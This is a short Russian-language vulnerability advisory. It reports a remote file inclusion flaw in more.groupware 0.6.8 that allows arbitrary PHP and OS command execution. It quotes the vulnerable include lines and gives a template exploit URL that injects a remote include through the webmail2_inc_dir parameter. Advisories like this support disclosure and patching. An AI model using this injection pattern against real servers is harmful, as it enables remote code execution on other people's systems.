Уязвимость включения файла обнаружена в
more.groupware. Удаленный пользователь может выполнить произвольный код на целевой системе.
Если удаленный сервер обрабатывает .inc файлы, то удаленный пользователь
может выполнить произвольный PHP код, включая команды операционной системы,
на целевом сервере с привилегиями Web сервера. Уязвимые сценарии: 

class.html.mime.mail.inc @ line 38 
require_once($webmail2_inc_dir.’mimepart.php’); 

rfc822.php @ line 20 
require_once($webmail2_inc_dir.’pear.php’); 

webmail2_func.inc @ line 32 | Variable: 
?appconf[rootpath] 

$webmail2_inc_dir = 
$appconf[«rootpath»].»/modules/webmail2/inc/»; 
include $webmail2_inc_dir."mime_types.php"; 

Пример: 

http://[server]/moregroupware/modules/webmail2/inc/[vuln file]?webmail2_inc_dir=[remote include] 

Уязвимость обнаружена в more.groupware 0.6.8.



Оставить мнение